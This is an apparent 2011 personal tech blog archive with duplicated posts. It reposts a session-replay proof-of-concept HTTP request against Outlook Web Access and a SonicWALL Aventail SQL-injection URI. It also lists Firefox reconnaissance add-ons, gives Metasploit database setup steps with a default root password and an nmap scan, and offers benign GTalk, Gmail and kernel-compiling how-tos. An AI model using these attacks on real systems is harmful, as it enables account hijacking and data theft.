Detail of POC can be viewed
http://www.securityfocus.com/bid/50361
Microsoft Outlook Web Access is prone to a security-bypass vulnerability.
Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.
Microsoft Outlook Web Access 8.2.254.0 is vulnerable; other versions may also be affected.
An attacker can carry out this attack using readily available network utilities.
The following proof of concept is available:
GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3
Tuesday, November 22, 2011
SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability
Detail of POC can be viewed
http://www.securityfocus.com/bid/50702
http://www.exploit-db.com/exploits/18122/
SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]
http://www.securityfocus.com/bid/50702
http://www.exploit-db.com/exploits/18122/
SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]
Sunday, September 11, 2011
Turning Firefox to an Ethical Hacking Platform
Information gathering
Whois and geo-location
ShowIP : Show the IP address of the current page in the status bar. It also allows querying custom services by IP (right mouse button) and Hostname (left mouse button), like whois, netcraft.
Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo-locate any website they are currently viewing.
HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox.
Active Whois : Starting Active Whois to get details about any Web site owner and its host server.
Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It includes ( WhoIs, DNS Report, Geolocation , Traceroute , Ping ). Very useful for information gathering phase
Enumeration / fingerprinting
Header Spy: Shows HTTP headers on statusbar
Header Monitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.
Social engineering
People Search and Public Record: This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.
Googling and spidering
Advanced dork : Gives quick access to Google’s Advanced Operators directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously (via the scroogle.org option) [Updated Definition. Thanks to CP author of Advanced Dork]
SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from www.httrack.com.
View Dependencies : View Dependencies adds a tab to the "page info" window, in which it lists all the files which were loaded to show the current page. (useful for a spidering technique)
Whois and geo-location
ShowIP : Show the IP address of the current page in the status bar. It also allows querying custom services by IP (right mouse button) and Hostname (left mouse button), like whois, netcraft.
Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo-locate any website they are currently viewing.
HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox.
Active Whois : Starting Active Whois to get details about any Web site owner and its host server.
Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It includes ( WhoIs, DNS Report, Geolocation , Traceroute , Ping ). Very useful for information gathering phase
Enumeration / fingerprinting
Header Spy: Shows HTTP headers on statusbar
Header Monitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.
Social engineering
People Search and Public Record: This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.
Googling and spidering
Advanced dork : Gives quick access to Google’s Advanced Operators directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously (via the scroogle.org option) [Updated Definition. Thanks to CP author of Advanced Dork]
SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from www.httrack.com.
View Dependencies : View Dependencies adds a tab to the "page info" window, in which it lists all the files which were loaded to show the current page. (useful for a spidering technique)
Sunday, May 22, 2011
Running Multiple Instances of Google Talk
Open Multiple Gtalk Instances
First find out where your GTalk is installed. This would usually be:
C:\Program Files\Google\Google Talk\googletalk.exe
Once you have found out where your Google Talk is,
• create a short cut by right clicking on your desktop and choosing Shortcut
• Browse and choose the location of the file and add “/nomutex” in the end of the location. So your path looks like this
“C:\Program%20Files\Google\Google%20Talk\googletalk.exe” /nomutex
That’s it. Now click on your usual link to open GTalk. After you open it, log into it. Now click on the new shortcut that you created to open the second Google Talk.
First find out where your GTalk is installed. This would usually be:
C:\Program Files\Google\Google Talk\googletalk.exe
Once you have found out where your Google Talk is,
• create a short cut by right clicking on your desktop and choosing Shortcut
• Browse and choose the location of the file and add “/nomutex” in the end of the location. So your path looks like this
“C:\Program%20Files\Google\Google%20Talk\googletalk.exe” /nomutex
That’s it. Now click on your usual link to open GTalk. After you open it, log into it. Now click on the new shortcut that you created to open the second Google Talk.
Backtrack db_driver mysql problem Error
Backtrack db_driver mysql problem Error
solution
1)# apt-get install libmysqlclient-dev
2) # start mysql or #/etc/init.d/mysql start
3)# mysql -u root -p'toor' by default password is toor
4)mysql> create database metasploit3; // mysql> create database;
6)mysql> grant all privileges on metasploit3.* to root@localhost;
mysql> exit
7)# update-alternatives --config ruby //
after choose type selection number: 0
8)# ruby -v //check ruby version it should be ruby 1.8.7
9)#gem install mysql
10)# ruby1.8 /pentest/exploits/framework3/msfconsole // it should be starting with ruby1.8 every u open msfconsole
11)msf > db_driver mysql
12)msf > db_connect root:toor@127.0.0.1:3306/metasploit3
13)msf > db_status
14)msf > db_nmap -sS -n 192.168.1.2 // check it working or not
cheer!!!!
solution
1)# apt-get install libmysqlclient-dev
2) # start mysql or #/etc/init.d/mysql start
3)# mysql -u root -p'toor' by default password is toor
4)mysql> create database metasploit3; // mysql> create database
6)mysql> grant all privileges on metasploit3.* to root@localhost;
mysql> exit
7)# update-alternatives --config ruby //
after choose type selection number: 0
8)# ruby -v //check ruby version it should be ruby 1.8.7
9)#gem install mysql
10)# ruby1.8 /pentest/exploits/framework3/msfconsole // it should be starting with ruby1.8 every u open msfconsole
11)msf > db_driver mysql
12)msf > db_connect root:toor@127.0.0.1:3306/metasploit3
13)msf > db_status
14)msf > db_nmap -sS -n 192.168.1.2 // check it working or not
cheer!!!!
Wednesday, April 27, 2011
Insert Images into Your Gmail Messages
Well, it's around 3am . one of my frd asked how to insert image in gmail
Solution: To put images into your messages or attach images want to inline them. Just turn on "Inserting images" from the Labs tab under Settings


Make sure you're in rich formatting mode, or it won't show up. Click the little image icon, and you can insert images in two ways: by uploading image files from your computer or providing image URLs.
Gmail doesn't show URL-based images in messages by default to protect you from spammers, so if you're sending mail to other Gmail users, they'll still have to click "Display images below" or "Always display images from ..." to see images you embed.
Tuesday, February 15, 2011
Compile Linux kernel 2.6
Step # 1 Get Latest Linux kernel code
Visit http://kernel.org/ and download the latest source code. File name would be linux-x.y.z.tar.bz2, where x.y.z is actual version number.
root@asheesh#cd /tmp
root@asheesh#wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2
Step # 2 Extract tar (.tar.bz2) file
root@asheesh# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
root@asheesh# cd /usr/src
Step # 3 Configure kernel
root@asheesh# apt-get install gcc (if gcc is not installed)
root@asheesh#make menuconfig
Step # 4 Compile kernel
Start compiling to create a compressed kernel image
root@asheesh# make
Start compiling to kernel modules:
root@asheesh# make modules
root@asheesh#make modules_install
Step # 5 Install kernel
Compiled kernel and installed kernel modules.
root@asheesh#make install
Step # 6: Create an initrd image
Type the following command at a shell prompt:
root@asheesh# cd /boot
root@asheesh# mkinitrd -o initrd.img-2.6.37 2.6.37
Step # 7 Modify Grub configuration file
- /boot/grub/menu.lst (before Edit Please take backup)
Open file using vi or gedit:
root@asheesh# vi /boot/grub/menu.lst
title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25
savedefault
boot
Remember to setup correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all lines by hand
is too much for you, try out update-grub command to update the lines for each kernel in /boot/grub/menu.lst file. Just type
the command:
root@asheesh#update-grub
Step # 8 : Reboot computer and boot into your new kernel
root@asheesh# reboot
Visit http://kernel.org/ and download the latest source code. File name would be linux-x.y.z.tar.bz2, where x.y.z is actual version number.
root@asheesh#cd /tmp
root@asheesh#wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2
Step # 2 Extract tar (.tar.bz2) file
root@asheesh# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
root@asheesh# cd /usr/src
Step # 3 Configure kernel
root@asheesh# apt-get install gcc (if gcc is not installed)
root@asheesh#make menuconfig
Step # 4 Compile kernel
Start compiling to create a compressed kernel image
root@asheesh# make
Start compiling to kernel modules:
root@asheesh# make modules
root@asheesh#make modules_install
Step # 5 Install kernel
Compiled kernel and installed kernel modules.
root@asheesh#make install
Step # 6: Create an initrd image
Type the following command at a shell prompt:
root@asheesh# cd /boot
root@asheesh# mkinitrd -o initrd.img-2.6.37 2.6.37
Step # 7 Modify Grub configuration file
- /boot/grub/menu.lst (before Edit Please take backup)
Open file using vi or gedit:
root@asheesh# vi /boot/grub/menu.lst
title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25
savedefault
boot
Remember to setup correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all lines by hand
is too much for you, try out update-grub command to update the lines for each kernel in /boot/grub/menu.lst file. Just type
the command:
root@asheesh#update-grub
Step # 8 : Reboot computer and boot into your new kernel
root@asheesh# reboot
Subscribe to:
Posts (Atom)